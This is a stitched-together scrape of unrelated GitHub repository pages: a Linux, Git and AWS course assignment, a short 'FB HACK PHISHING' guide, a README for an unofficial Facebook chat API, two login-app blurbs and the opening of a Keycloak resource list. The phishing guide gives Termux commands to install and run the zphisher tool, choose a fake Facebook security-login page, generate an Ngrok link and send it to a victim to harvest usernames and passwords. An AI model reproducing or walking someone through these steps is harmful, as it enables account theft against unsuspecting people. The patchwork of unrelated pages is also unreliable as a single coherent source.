nyaundid / EC2 AWS AND SHELL SEIS 665 Assignment 2: Linux & Git Overview This week we will focus on becoming familiar with launching a Linux server and working with some basic Linux and Git commands. We will use AWS to launch and host the Linux server. AWS might seem a little confusing at this point. Don’t worry, we will gain much more hands-on experience with AWS throughout the course. The goal is to get you comfortable working with the technology and not overwhelm you with all the details. Requirements You need to have a personal AWS account and GitHub account for this assignment. You should also read the Git Hands-on Guide and Linux Hands-on Guide before beginning this exercise. A word about grading One of the key DevOps practices we learn about in this class is the use of automation to increase the speed and repeatability of processes. Automation is utilized during the assignment grading process to review and assess your work. It’s important that you follow the instructions in each assignment and type in required files and resources with the proper names. All names are case sensitive, so a name like "Web1" is not the same as "web1". If you misspell a name, use the wrong case, or put a file in the wrong directory location you will lose points on your assignment. This is the easiest way to lose points, and also the most preventable. You should always double-check your work to make sure it accurately reflects the requirements specified in the assignment. You should always carefully review the content of your files before submitting your assignment. The assignment Let’s get started! Create GitHub repository The first step in the assignment is to set up a Git repository on GitHub. We will use a special solution called GitHub Classroom for this course which automates the process of setting up student assignment repositories.
Here are the basic steps: Click on the following link to open Assignment 2 on the GitHub Classroom site: https://classroom.github.com/a/K4zcVmX- Click on the Accept this assignment button. GitHub Classroom will provide you with a URL (https) to access the assignment repository. Either copy this address to your clipboard or write it down somewhere. You will need to use this address to set up the repository on a Linux server. Example: https://github.com/UST-SEIS665/hw2-seis665-02-spring2019-<your github id>.git At this point your new repository is ready to use. The repository is currently empty. We will put some content in there soon! Launch Linux server The second step in the assignment is to launch a Linux server using AWS EC2. The server should have the following characteristics: Amazon Linux 2 AMI 64-bit (usually the first option listed) Located in a U.S. region (us-east-1) t2.micro instance type All default instance settings (storage, VPC, security group, etc.) I’ve shown you how to launch EC2 instances in class. You can review it on Canvas. Once you launch the new server, it may take a few minutes to provision. Log into server The next step is to log into the Linux server using a terminal program with secure shell (SSH) support. You can use iTerm2 on a Mac and GitBash/PuTTY on a PC. You will need to have the private server key and the public IP address before attempting to log into the server. The server key is basically your password. If you lose it, you will need to terminate the existing instance and launch a new server. I recommend reusing the same key when launching new servers throughout the class. Note, I make this recommendation to make the learning process easier and not because it is a common security practice.
I’ve shown you how to use a terminal application to log into the instance using a Windows desktop. Your personal computer or lab computer may be running a different OS version, but the process is still very similar. You can review the videos on Canvas. Working with Linux If you’ve made it this far, congratulations! You’ve made it over the toughest hurdle. By the end of this course, I promise you will be able to launch and log into servers in your sleep. You should be looking at a login screen that looks something like this: Last login: Mon Mar 21 21:17:54 2016 from 174-20-199-194.mpls.qwest.net __| __|_ ) _| ( / Amazon Linux AMI ___|\___|___| https://aws.amazon.com/amazon-linux-ami/2015.09-release-notes/ 8 package(s) needed for security, out of 17 available Run "sudo yum update" to apply all updates. [ec2-user@ip-172-31-15-26 ~]$ Your terminal cursor is sitting at the shell prompt, waiting for you to type in your first command. Remember the shell? It is a really cool program that lets you start other programs and manage services on the Linux system. The rest of this assignment will be spent working with the shell. Note, when you are asked to type in a command in the steps below, don’t type in the dollar-sign ($) character. This is just meant to represent the command prompt. The actual commands are represented by the characters to the right of the command prompt. Let’s start by asking the shell for some help. Type in: $ help The shell provides you with a list of commands you can run along with possible command options. Next, check out one of the pages in the built-in manual: $ man ls A man page will appear with information on how to use the ls command. This command is used to list the contents of file directories. Either space through the contents of the man page or hit q to exit. Most of the core Linux commands have man pages available. But honestly, some of these man pages are a bit hard to understand.
Sometimes your best bet is to search on Google if you are trying to figure out how to use a specific command. When you initially log into Linux, the system places you in your home directory. Each user on the system has a separate home directory. Let’s see where your home directory is located: $ pwd The response should be /home/ec2-user. The pwd command is handy to remember if you ever forget what file directory you are currently located in. If you recall from the Linux Hands-on Guide, this directory is also your current working directory. Type in: $ cd / The cd command lets you change to a new working directory on the server. In this case, we changed to the root (/) directory. This is the parent of all the other directories on the file system. Type in: $ ls The ls command lists the contents of the current directory. As you can see, the root directory contains many other directories. You will become familiar with these directories over time. The ls command provides a very basic directory listing. You need to supply the command with some options if you want to see more detailed information. Type in: $ ls -la See how this command provides you with much more detailed information about the files and directories? You can use this detailed listing to see the owner, group, and access control list settings for each file or directory. Do you see any files listed? Remember, the first character in the access control list column denotes whether a listed item is a file or a directory. You probably see a couple files with names like .autofsck. How come you didn’t see this file when you typed in the ls command without any options? (Try to run this command again to convince yourself.) File names that start with a period are called hidden files. These files won’t appear on normal directory listings. Type in: $ cd /var Then, type in: $ ls You will see a directory listing for the /var directory. Next, type in: $ ls .. Huh.
This directory listing looks the same as the earlier root directory listing. When you use two periods (..) in a directory path that means you are referring to the parent directory of the current directory. Just think of the two dots as meaning the directory above the current directory. Now, type in: $ cd ~ $ pwd Whoa. We’re back at our home directory again. The tilde character (~) is another one of those handy little directory path shortcuts. It always refers to our personal home directory. Keep in mind that since every user has their own home directory, the tilde shortcut will refer to a unique directory for each logged-in user. Most students are used to navigating a file system by clicking a mouse in nested graphical folders. When they start using a command-line to navigate a file system, they sometimes get confused and lose track of their current position in the file system. Remember, you can always use the pwd command to quickly figure out what directory you are currently working in. Let’s make some changes to the file system. We can easily make our own directories on the file system. Type: mkdir test Now type: ls Cool, there’s our new test directory. Let’s pretend we don’t like that directory name and delete it. Type: rmdir test Now it’s gone. How can you be sure? You should know how to check to see if the directory still exists at this point. Go ahead and check. Let’s create another directory. Type in: $ mkdir documents Next, change to the new directory: $ cd documents Did you notice that your command prompt displays the name of the current directory? Something like: [ec2-user@ip-172-31-15-26 documents]$. Pretty handy, huh? Okay, let’s create our first file in the documents directory. This is just an empty file for training purposes. Type in: $ touch paper.txt Check to see that the new file is in the directory. Now, go back to the previous directory. Remember the double dot shortcut? $ cd .. Okay, we don’t like our documents directory any more. 
Let’s blow it away. Type in: $ rmdir documents Uh oh. The shell didn’t like that command because the directory isn’t empty. Let’s change back into the documents directory. But this time don’t type in the full name of the directory. You can let shell auto-completion do the typing for you. Type in the first couple characters of the directory name and then hit the tab key: $ cd doc<tab> You should use the tab auto-completion feature often. It saves typing and makes working with the Linux file system much much easier. Tab is your friend. Now, remove the file by typing: $ rm paper.txt Did you try to use the tab key instead of typing in the whole file name? Check to make sure the file was deleted from the directory. Next, create a new file: $ touch file1 We like file1 so much that we want to make a backup copy. Type: $ cp file1 file1-backup Check to make sure the new backup copy was created. We don’t really like the name of that new file, so let’s rename it. Type: $ mv file1-backup backup Moving a file to the same directory and giving it a new name is basically the same thing as renaming it. We could have moved it to a different directory if we wanted. Let’s list all of the files in the current directory that start with the letter f: $ ls f* Using wildcard pattern matching in file commands is really useful if you want the command to impact or filter a group of files. Now, go up one directory to the parent directory (remember the double dot shortcut?) We tried to remove the documents directory earlier when it had files in it. Obviously that won’t work again. However, we can use a more powerful command to destroy the directory and vanquish its contents. Behold, the all powerful remove command: $ rm -fr documents Did you remember to use auto-completion when typing in documents? This command and set of options forcibly removes the directory and its contents. It’s a dangerous command wielded by the mightiest Linux wizards. Okay, maybe that’s a bit of an exaggeration. 
Just be careful with it. Check to make sure the documents directory is gone before proceeding. Let’s continue. Change to the directory /var and make a directory called test. Ugh. Permission denied. We created this darn Linux server and we paid for it. Shouldn’t we be able to do anything we want on it? You logged into the system as a user called ec2-user. While this user can create and manage files in its home directory, it cannot change files all across the system. At least it can’t as a normal user. The ec2-user is a member of the root group, so it can escalate its privileges to super-user status when necessary. Let’s try it: $ sudo mkdir test Check to make sure the directory exists now. Using sudo we can execute commands as a super-user. We can do anything we want now that we know this powerful new command. Go ahead and delete the test directory. Did you remember to use sudo before the rmdir command? Check to make sure the directory is gone. You might be asking yourself the question: why can we list the contents of the /var directory but not make changes? That’s because all users have read access to the /var directory and the ls command is a read function. Only the root users or those acting as a super-user can write changes to the directory. Let’s go back to our home directory: $ cd ~ Editing text files is a really common task on Linux systems because many of the application configuration files are text files. We can create a text file by using a text editor. Type in: $ nano myfile.conf The shell starts up the nano text editor and places your terminal cursor in the editing screen. Nano is a simple text-based word processor. Type in a few lines of text. When you’re done writing your novel, hit ctrl-x and answer y to the prompt to save your work. Finally, hit enter to save the text to the filename you specified. Check to see that your file was saved in the directory. 
You can take a look at the contents of your file by typing: $ cat myfile.conf The cat command displays your text file content on the terminal screen. This command works fine for displaying small text files. But if your file is hundreds of lines long, the content will scroll down your terminal screen so fast that you won’t be able to easily read it. There’s a better way to view larger text files. Type in: $ less myfile.conf The less command will page the display of a text file, allowing you to page through the contents of the file using the space bar. Your text file is probably too short to see the paging in action though. Hit q to quit out of the less text viewer. Hit the up-arrow key on your keyboard a few times until the command nano myfile.conf appears next to your command prompt. Cool, huh? The up-arrow key allows you to replay a previously run command. Linux maintains a list of all the commands you have run since you logged into the server. This is called the command history. It’s a really useful feature if you have to re-run a complex command again. Now, hit ctrl-c. This cancels whatever command is displayed on the command line. Type in the following command to create a couple empty files in the directory: $ touch file1 file2 file3 Confirm that the files were created. Some commands, like touch, allow you to specify multiple files as arguments. You will find that Linux commands have all kinds of ways to make tasks more efficient like this. Throughout this assignment, we have been running commands and viewing results on the terminal screen. The screen is the standard place for commands to output results. It’s known as the standard out (stdout). However, it’s really useful to output results to the file system sometimes. Type in: $ ls > listing.txt Take a look at the directory listing now. You just created a new file. View the contents of the listing.txt file. What do you see?
Instead of sending the output from the ls command to the screen we sent it to a text file. Let’s try another one. Type: $ cat myfile.conf > listing.txt Take a look at the contents of the listing.txt file again. It looks like your myfile.conf file now. It’s like you made a copy of it. But what happened to the previous content in the listing.txt file? When you redirect the output of a command using the right angle-bracket character (>), the output overwrites the existing file. Type this command in: $ cat myfile.conf >> listing.txt Now look at the contents of the listing.txt file. You should see your original content displayed twice. When you use two angle-bracket characters in the command the output appends (or adds to) the file instead of overwriting it. We redirected the output from a command to a text file. It’s also possible to redirect the input to a command. Typically we use a keyboard to provide input, but sometimes it makes more sense to input a file to a command. For example, how many words are in your new listing.txt file? Let’s find out. Type in: $ wc -w < listing.txt Did you get a number? This command inputs the listing.txt file into a word count program called wc. Type in the command: $ ls /usr/bin The terminal screen probably scrolled quickly as filenames flashed by. The /usr/bin directory holds quite a few files. It would be nice if we could page through the contents of this directory. Well, we can. We can use a special shell feature called pipes. In previous steps, we redirected I/O using the file system. Pipes allow us to redirect I/O between programs. We can redirect the output from one program into another. Type in: $ ls /usr/bin | less Now the directory listing is paged. Hit the spacebar to page through the listing. The pipe, represented by a vertical bar character (|), takes the output from the ls command and redirects it to the less command where the resulting output is paged.
Pipes are super powerful and used all the time by savvy Linux operators. Hit the q key to quit the paginated directory listing command. Working with shell scripts Now things are going to get interesting. We’ve been manually typing in commands throughout this exercise. If we were running a set of repetitive tasks, we would want to automate the process as much as possible. The shell makes it really easy to automate tasks using shell scripts. The shell provides many of the same features as a basic procedural programming language. Let’s write some code. Type in this command: $ j=123 $ echo $j We just created a variable named j referencing the string 123. The echo command printed out the value of the variable. We had to use a dollar sign ($) when referencing the variable in another command. Next, type in: $ j=1+1 $ echo $j Is that what you expected? The shell just interprets the variable value as a string. It’s not going to do any sort of computation. Typing in shell script commands on the command line is sort of pointless. We want to be able to create scripts that we can run over-and-over. Let’s create our first shell script. Use the nano editor to create a file named myscript. When the file is open in the editor, type in the following lines of code: #!/bin/bash echo Hello $1 Now quit the editor and save your file. We can run our script by typing: $ ./myscript World Er, what happened? Permission denied. Didn’t we create this file? Why can’t we run it? We can’t run the script file because we haven’t set the execute permission on the file. Type in: $ chmod u+x myscript This modifies the file access control list to allow the owner of the file to execute it. Let’s try to run the command again. Hit the up-arrow key a couple times until the ./myscript World command is displayed and hit enter. Hooray! Our first shell script. It’s probably a bit underwhelming. No problem, we’ll make it a little more complex. The script took a single argument called World. 
Any arguments provided to a shell script are represented as consecutively numbered variables inside the script ($1, $2, etc). Pretty simple. You might be wondering why we had to type the ./ characters before the name of our script file. Try to type in the command without them: $ myscript World Command not found. That seems a little weird. Aren’t we currently in the directory where the shell script is located? Well, that’s just not how the shell works. When you enter a command into the shell, it looks for the command in a predefined set of directories on the server called your PATH. Since your script file isn’t in your special path, the shell reports it as not found. By typing in the ./ characters before the command name you are basically forcing the shell to look for your script in the current directory instead of the default path. Create another file called cleanup using nano. In the file editor window type: #!/bin/bash # My cleanup script mkdir archive mv file* archive Exit the editor window and save the file. Change the permissions on the script file so that you can execute it. Now run the command: $ ./cleanup Take a look at the file directory listing. Notice the archive directory? List the contents of that directory. The script automatically created a new directory and moved three files into it. Anything you can do manually at a command prompt can be automated using a shell script. Let’s create one more shell script. Use nano to create a script called namelist. Here is the content of the script: #!/bin/bash # for-loop test script names='Jason John Jane' for i in $names do echo Hello $i done Change the permissions on the script file so that you can execute it. Run the command: $ ./namelist The script will loop through a set of names stored in a variable displaying each one. Scripts support several programming constructs like for-loops, do-while loops, and if-then-else. These building blocks allow you to create fairly complex scripts for automating tasks. 
Installing packages and services We’re nearing the end of this assignment. But before we finish, let’s install some new software packages on our server. The first thing we should do is make sure all the current packages installed on our Linux server are up-to-date. Type in: $ sudo yum update -y This is one of those really powerful commands that requires sudo access. The system will review the currently installed packages and go out to the Internet and download appropriate updates. Next, let’s install an Apache web server on our system. Type in: $ sudo yum install httpd -y Bam! You probably never knew that installing a web server was so easy. We’re not going to actually use the web server in this exercise, but we will in future assignments. We installed the web server, but is it actually running? Let’s check. Type in: $ sudo service httpd status Nope. Let’s start it. Type: $ sudo service httpd start We can use the service command to control the services running on the system. Let’s set up the service so that it automatically starts when the system boots up. Type in: $ sudo chkconfig httpd on Cool. We installed the Apache web server on our system, but what other programs are currently running? We can use the ps command to find out. Type in: $ ps -ax Lots of processes are running on our system. We can even look at the overall performance of our system using the top command. Let’s try that now. Type in: $ top The display might seem a little overwhelming at first. You should see lots of performance information displayed including the cpu usage, free memory, and a list of running tasks. We’re almost across the finish line. Let’s make sure all of our valuable work is stored in a git repository. First, we need to install git. Type in the command: $ sudo yum install git -y Check your work It’s very important to check your work before submitting it for grading. A misspelled, misplaced or missing file will cost you points.
This may seem harsh, but the reality is that these sorts of mistakes have consequences in the real world. For example, a server instance could fail to launch properly and impact customers because a single required file is missing. Here is what the contents of your git repository should look like before final submission: ┣archive ┃ ┣ file1 ┃ ┣ file2 ┃ ┗ file3 ┣ namelist ┗ myfile.conf Saving our work in the git repository Next, make sure you are still in your home directory (/home/ec2-user). We will install the git repository you created at the beginning of this exercise. You will need to modify this command by typing in the GitHub repository URL you copied earlier. $ git clone <your GitHub URL here>.git Example: git clone https://github.com/UST-SEIS665/hw2-seis665-02-spring2019-<your github id>.git The git application will ask you for your GitHub username and password. Note, if you have multi-factor authentication enabled on your GitHub account you will need to provide a personal token instead of your password. Git will clone (copy) the repository from GitHub to your Linux server. Since the repository is empty the clone happens almost instantly. Check to make sure that a sub-directory called "hw2-seis665-02-spring2019-<username>" exists in the current directory (where <username> is your GitHub account name). Git automatically created this directory as part of the cloning process. Change to the hw2-seis665-02-spring2019-<username> directory and type: $ ls -la Notice the .git hidden directory? This is where git actually stores all of the file changes in your repository. Nothing is actually in your repository yet. Change back to the parent directory (cd ..). Next, let’s move some of our files into the repository. Type: $ mv archive hw2-seis665-02-spring2019-<username> $ mv namelist hw2-seis665-02-spring2019-<username> $ mv myfile.conf hw2-seis665-02-spring2019-<username> Hopefully, you remembered to use the auto-complete function to reduce some of that typing. 
Change to the hw2-seis665-02-spring2019-<username> directory and list the directory contents. Your files are in the working directory, but are not actually stored in the repository because they haven’t been committed yet. Type in: $ git status You should see a list of untracked files. Let’s tell git that we want these files tracked. Type in: $ git add * Now type in the git status command again. Notice how all the files are now being tracked and are ready to be committed. These files are in the git staging area. We’ll commit them to the repository next. Type: $ git commit -m 'assignment 2 files' Next, take a look at the commit log. Type: $ git log You should see your commit listed along with an assigned hash (long string of random-looking characters). Finally, let’s save the repository to our GitHub account. Type in: $ git push origin master The git client will ask you for your GitHub username and password before pushing the repository. Go back to the GitHub.com website and login if you have been logged out. Click on the repository link for the assignment. Do you see your files listed there? Congratulations, you completed the exercise! Terminate server The last step is to terminate your Linux instance. AWS will bill you for every hour the instance is running. The cost is nominal, but there’s no need to rack up unnecessary charges. Here are the steps to terminate your instance: Log into your AWS account and click on the EC2 dashboard. Click the Instances menu item. Select your server in the instances table. Click on the Actions drop down menu above the instances table. Select the Instance State menu option. Click on the Terminate action. Your Linux instance will shut down and disappear in a few minutes. The EC2 dashboard will continue to display the instance on your instance listing for another day or so. However, the state of the instance will be terminated. Submitting your assignment — IMPORTANT!
If you haven’t already, please e-mail me your GitHub username in order to receive credit for this assignment. There is no need to email me to tell me that you have committed your work to GitHub or to ask me if your GitHub submission worked. If you can see your work in your GitHub repository, I can see your work.
Zakwan96 / FB HACK PHISHING Step 1 - Install Termux App on your Android smartphone. Step 2 - type commands as shown below: $ apt update && apt upgrade $ pkg install git $ pkg install php $ pkg install openssh $ git clone https://github.com/htr-tech/zphisher $ cd zphisher $ chmod +x * $ bash zphisher.sh now turn on your mobile hotspot Now select, of which social site you want to make phishing page. By enter number ~I choose 1 for facebook phishing page here you see, 4 options on which you able to make phishing page. All of them look like original page, so it is easy to gain victim trust ~so here, I select 3 (fake security login page) Now here, you have to select 2 (Ngrok.io) it is good for generate link Note: make sure your hotspot is ON Here you see in above picture, you get link...... Now copy this link & send to your victim, when victim open this link in his browser: Victim see this (as shown in above picture) It is same as original page of facebook so victim trust it easily and now victim entered his details like: username, passwords. After victim type his details.
Tinkprocodes / Fca Unofficial

This repo is a fork from main repo and will usually have new features bundled faster than main repo (and maybe bundle some bugs, too).

# Unofficial Facebook Chat API

<img alt="version" src="https://img.shields.io/github/package-json/v/ProCoderMew/fca-unofficial?label=github&style=flat-square">

Facebook now has an official API for chat bots [here](https://developers.facebook.com/docs/messenger-platform).

This API is the only way to automate chat functionalities on a user account. We do this by emulating the browser. This means doing the exact same GET/POST requests and tricking Facebook into thinking we're accessing the website normally. Because we're doing it this way, this API won't work with an auth token but requires the credentials of a Facebook account.

_Disclaimer_: We are not responsible if your account gets banned for spammy activities such as sending lots of messages to people you don't know, sending messages very quickly, sending spammy looking URLs, logging in and out very quickly... Be responsible Facebook citizens.

See [below](#projects-using-this-api) for projects using this API.

## Install

If you just want to use fca-unofficial, you should use this command:

```bash
npm install procodermew/fca-unofficial
```

It will download `fca-unofficial` from NPM repositories.

## Testing your bots

If you want to test your bots without creating another account on Facebook, you can use [Facebook Whitehat Accounts](https://www.facebook.com/whitehat/accounts/).

## Example Usage

```javascript
const login = require("fca-unofficial");

// Create simple echo bot
login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => {
    if(err) return console.error(err);

    api.listen((err, message) => {
        api.sendMessage(message.body, message.threadID);
    });
});
```

Result:

<img width="517" alt="screen shot 2016-11-04 at 14 36 00" src="https://cloud.githubusercontent.com/assets/4534692/20023545/f8c24130-a29d-11e6-9ef7-47568bdbc1f2.png">

## Documentation

You can see it [here](DOCS.md).

## Main Functionality

### Sending a message

#### api.sendMessage(message, threadID[, callback][, messageID])

Various types of message can be sent:

* *Regular:* set field `body` to the desired message as a string.
* *Sticker:* set a field `sticker` to the desired sticker ID.
* *File or image:* Set field `attachment` to a readable stream or an array of readable streams.
* *URL:* set a field `url` to the desired URL.
* *Emoji:* set field `emoji` to the desired emoji as a string and set field `emojiSize` with size of the emoji (`small`, `medium`, `large`)

Note that a message can only be a regular message (which can be empty) and optionally one of the following: a sticker, an attachment or a url.

__Tip__: to find your own ID, you can look inside the cookies. The `userID` is under the name `c_user`.

__Example (Basic Message)__

```js
const login = require("fca-unofficial");

login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => {
    if(err) return console.error(err);

    var yourID = "000000000000000";
    var msg = "Hey!";
    api.sendMessage(msg, yourID);
});
```

__Example (File upload)__

```js
const fs = require("fs"); // needed for fs.createReadStream below
const login = require("fca-unofficial");

login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => {
    if(err) return console.error(err);

    // Note this example uploads an image called image.jpg
    var yourID = "000000000000000";
    var msg = {
        body: "Hey!",
        attachment: fs.createReadStream(__dirname + '/image.jpg')
    }
    api.sendMessage(msg, yourID);
});
```

------------------------------------

### Saving session.

To avoid logging in every time you should save AppState (cookies etc.) to a file, then you can use it without having password in your scripts.

__Example__

```js
const fs = require("fs");
const login = require("fca-unofficial");

var credentials = {email: "FB_EMAIL", password: "FB_PASSWORD"};

login(credentials, (err, api) => {
    if(err) return console.error(err);

    fs.writeFileSync('appstate.json', JSON.stringify(api.getAppState()));
});
```

Alternative: Use [c3c-fbstate](https://github.com/c3cbot/c3c-fbstate) to get fbstate.json (appstate.json)

------------------------------------

### Listening to a chat

#### api.listen(callback)

Listen watches for messages sent in a chat. By default this won't receive events (joining/leaving a chat, title change etc…) but it can be activated with `api.setOptions({listenEvents: true})`. This will by default ignore messages sent by the current account, you can enable listening to your own messages with `api.setOptions({selfListen: true})`.

__Example__

```js
const fs = require("fs");
const login = require("fca-unofficial");

// Simple echo bot. It will repeat everything that you say.
// Will stop when you say '/stop'
login({appState: JSON.parse(fs.readFileSync('appstate.json', 'utf8'))}, (err, api) => {
    if(err) return console.error(err);

    api.setOptions({listenEvents: true});

    var stopListening = api.listenMqtt((err, event) => {
        if(err) return console.error(err);

        api.markAsRead(event.threadID, (err) => {
            if(err) console.error(err);
        });

        switch(event.type) {
            case "message":
                if(event.body === '/stop') {
                    api.sendMessage("Goodbye…", event.threadID);
                    return stopListening();
                }
                api.sendMessage("TEST BOT: " + event.body, event.threadID);
                break;
            case "event":
                console.log(event);
                break;
        }
    });
});
```

## FAQS

1. How do I run tests?
> For tests, create a `test-config.json` file that resembles `example-config.json` and put it in the `test` directory. From the root directory, run `npm test`.

2. Why doesn't `sendMessage` always work when I'm logged in as a page?
> Pages can't start conversations with users directly; this is to prevent pages from spamming users.

3. What do I do when `login` doesn't work?
> First check that you can login to Facebook using the website. If login approvals are enabled, you might be logging in incorrectly. For how to handle login approvals, read our docs on [`login`](DOCS.md#login).

4. How can I avoid logging in every time? Can I log into a previous session?
> We support caching everything relevant for you to bypass login. `api.getAppState()` returns an object that you can save and pass into login as `{appState: mySavedAppState}` instead of the credentials object. If this fails, your session has expired.

5. Do you support sending messages as a page?
> Yes, set the pageID option on login (this doesn't work if you set it using api.setOptions, it affects the login process).
> ```js
> login(credentials, {pageID: "000000000000000"}, (err, api) => { … });
> ```

6. I'm getting some crazy weird syntax error like `SyntaxError: Unexpected token [`!!!
> Please try to update your version of node.js before submitting an issue of this nature.
We like to use new language features. 7. I don't want all of these logging messages! > You can use `api.setOptions` to silence the logging. You get the `api` object from `login` (see example above). Do > ```js > api.setOptions({ > logLevel: "silent" > }); > ``` <a name="projects-using-this-api"></a> ## Projects using this API: - [c3c](https://github.com/lequanglam/c3c) - A bot that can be customizable using plugins. Support Facebook & Discord. - [Miraiv2](https://github.com/miraiPr0ject/miraiv2) - A simple Facebook Messenger Bot made by CatalizCS and SpermLord. ## Projects using this API (original repository, facebook-chat-api): - [Messer](https://github.com/mjkaufer/Messer) - Command-line messaging for Facebook Messenger - [messen](https://github.com/tomquirk/messen) - Rapidly build Facebook Messenger apps in Node.js - [Concierge](https://github.com/concierge/Concierge) - Concierge is a highly modular, easily extensible general purpose chat bot with a built in package manager - [Marc Zuckerbot](https://github.com/bsansouci/marc-zuckerbot) - Facebook chat bot - [Marc Thuckerbot](https://github.com/bsansouci/lisp-bot) - Programmable lisp bot - [MarkovsInequality](https://github.com/logicx24/MarkovsInequality) - Extensible chat bot adding useful functions to Facebook Messenger - [AllanBot](https://github.com/AllanWang/AllanBot-Public) - Extensive module that combines the facebook api with firebase to create numerous functions; no coding experience is required to implement this. 
- [Larry Pudding Dog Bot](https://github.com/Larry850806/facebook-chat-bot) - A facebook bot you can easily customize the response - [fbash](https://github.com/avikj/fbash) - Run commands on your computer's terminal over Facebook Messenger - [Klink](https://github.com/KeNt178/klink) - This Chrome extension will 1-click share the link of your active tab over Facebook Messenger - [Botyo](https://github.com/ivkos/botyo) - Modular bot designed for group chat rooms on Facebook - [matrix-puppet-facebook](https://github.com/matrix-hacks/matrix-puppet-facebook) - A facebook bridge for [matrix](https://matrix.org) - [facebot](https://github.com/Weetbix/facebot) - A facebook bridge for Slack. - [Botium](https://github.com/codeforequity-at/botium-core) - The Selenium for Chatbots - [Messenger-CLI](https://github.com/AstroCB/Messenger-CLI) - A command-line interface for sending and receiving messages through Facebook Messenger. - [AssumeZero-Bot](https://github.com/AstroCB/AssumeZero-Bot) – A highly customizable Facebook Messenger bot for group chats. - [Miscord](https://github.com/Bjornskjald/miscord) - An easy-to-use Facebook bridge for Discord. - [chat-bridge](https://github.com/rexx0520/chat-bridge) - A Messenger, Telegram and IRC chat bridge. - [messenger-auto-reply](https://gitlab.com/theSander/messenger-auto-reply) - An auto-reply service for Messenger. - [BotCore](https://github.com/AstroCB/BotCore) – A collection of tools for writing and managing Facebook Messenger bots. - [mnotify](https://github.com/AstroCB/mnotify) – A command-line utility for sending alerts and notifications through Facebook Messenger.
PrincewillIroka / Login With Github
An app that implements "Login with GitHub" functionality in React JS
m-haecker / Nestjs Social Login
OAuth2 in NestJS for Social Login with GitHub (Google, Facebook, …)
BabyJ723 / Blast ON
# Awesome Keycloak

# [<img src="https://www.keycloak.org/resources/images/keycloak_logo_480x108.png">](https://github.com/thomasdarimont/awesome-keycloak)

> Carefully curated list of awesome Keycloak resources.

A curated list of resources for learning about the Open Source Identity and Access Management solution Keycloak. Contains books, websites, blog posts, links to GitHub repositories.

# Contributing

Contributions welcome. Add links through pull requests or create an issue to start a discussion. [Please refer to the contributing guide for details](CONTRIBUTING.md).

# Contents

* [General](#general)
    * [Documentation](#docs)
        * [Keycloak Website](http://www.keycloak.org)
        * [Current Documentation](http://www.keycloak.org/documentation.html)
        * [Archived Documentation](http://www.keycloak.org/documentation-archive.html)
    * [Mailing Lists](#mailing-lists)
        * [User Mailing List](#user-mailing-list)
        * [Developer Mailing List](#dev-mailing-list)
        * [Mailing List Search](#mailing-list-search)
* [Books](#books)
* [Articles](#articles)
* [Talks](#talks)
* [Presentations](#presentations)
* [Video Playlists](#video-playlists)
* [Community Extensions](#community-extensions)
* [Integrations](#integrations)
* [Themes](#themes)
* [Docker](#docker)
* [Deployment Examples](#deployment-examples)
* [Example Projects](#example-projects)
* [Benchmarks](#benchmarks)
* [Help](#help)
* [Commercial Offerings](#commercial-offerings)
* [Miscellaneous](#miscellaneous)

# General

## Documentation

* [Keycloak Website](http://www.keycloak.org/)
* [Current Documentation](http://www.keycloak.org/documentation.html)
* [Archived Documentation](http://www.keycloak.org/documentation-archive.html)
* [Product Documentation for Red Hat Single Sign-On](https://access.redhat.com/documentation/en/red-hat-single-sign-on/)

## Discussion Groups and Mailing Lists

* [Keycloak Users Google Group](https://groups.google.com/forum/#!forum/keycloak-user)
* [Keycloak Developers Google Group](https://groups.google.com/forum/#!forum/keycloak-dev)
* [Keycloak Discourse Group](https://keycloak.discourse.group/)
* [Keycloak Developer Chat](https://keycloak.zulipchat.com)
* [Inactive - User Mailing List](https://lists.jboss.org/mailman/listinfo/keycloak-user)
* [Inactive - Developer Mailing List](https://lists.jboss.org/mailman/listinfo/keycloak-dev)
* [Mailing List Search](http://www.keycloak.org/search)
* [Keycloak Subreddit](https://www.reddit.com/r/keycloak)

## Books

* [Keycloak - Identity and Access Management for Modern Applications](https://www.packtpub.com/product/keycloak-identity-and-access-management-for-modern-applications/9781800562493)

## Articles

* [How to get Keycloak working with Docker](https://www.ivonet.nl/2015/05/23/Keycloak-Docker/)
* [Single-Sign-On for Microservices and/or Java EE applications with Keycloak SSO](http://www.n-k.de/2016/06/keycloak-sso-for-microservices.html)
* [Keycloak Admin Client(s) - multiple ways to manage your SSO system](http://www.n-k.de/2016/08/keycloak-admin-client.html)
* [How to get the AccessToken of Keycloak in Spring Boot and/or Java EE](http://www.n-k.de/2016/05/how-to-get-accesstoken-from-keycloak-springboot-javaee.html)
* [JWT authentication with Vert.x, Keycloak and Angular 2](http://paulbakker.io/java/jwt-keycloak-angular2/)
* [Authenticating via Kerberos with Keycloak and Windows 2008 Active Directory](http://matthewcasperson.blogspot.de/2015/07/authenticating-via-kerberos-with.html)
* [Deploying Keycloak with Ansible](https://adam.younglogic.com/2016/01/deploying-keycloak-via-ansible/)
* [Easily secure your Spring Boot applications with Keycloak](https://developers.redhat.com/blog/2017/05/25/easily-secure-your-spring-boot-applications-with-keycloak/)
* [How Red Hat re-designed its Single Sign On (SSO) architecture, and why](https://developers.redhat.com/blog/2016/10/04/how-red-hat-re-designed-its-single-sign-on-sso-architecture-and-why/)
* [OAuth2, JWT, Open-ID Connect and other confusing things](http://giallone.blogspot.de/2017/06/oath2.html)
* [X509 Authentication with Keycloak and JBoss Fuse](https://sjhiggs.github.io/fuse/sso/x509/smartcard/2017/03/29/fuse-hawtio-keycloak.html)
* [Running Keycloak on OpenShift 3](https://medium.com/@sbose78/running-keycloak-on-openshift-3-8d195c0daaf6)
* [Introducing Keycloak for Identity and Access Management](https://www.thomasvitale.com/introducing-keycloak-identity-access-management/)
* [Keycloak Basic Configuration for Authentication and Authorisation](https://www.thomasvitale.com/keycloak-configuration-authentication-authorisation/)
* [Keycloak on OpenShift Origin](https://medium.com/@james_devcomb/keycloak-on-openshift-origin-ee81d01dac97)
* [Identity Management, One-Time-Passwords and Two-Factor-Auth with Spring Boot and Keycloak](http://www.hascode.com/2017/11/identity-management-one-time-passwords-and-two-factor-auth-with-spring-boot-and-keycloak/)
* [Keycloak Identity Brokering with Openshift](https://developers.redhat.com/blog/2017/12/06/keycloak-identity-brokering-openshift/)
* [OpenID Connect Identity Brokering with Red Hat Single Sign-On](https://developers.redhat.com/blog/2017/10/18/openid-connect-identity-brokering-red-hat-single-sign/)
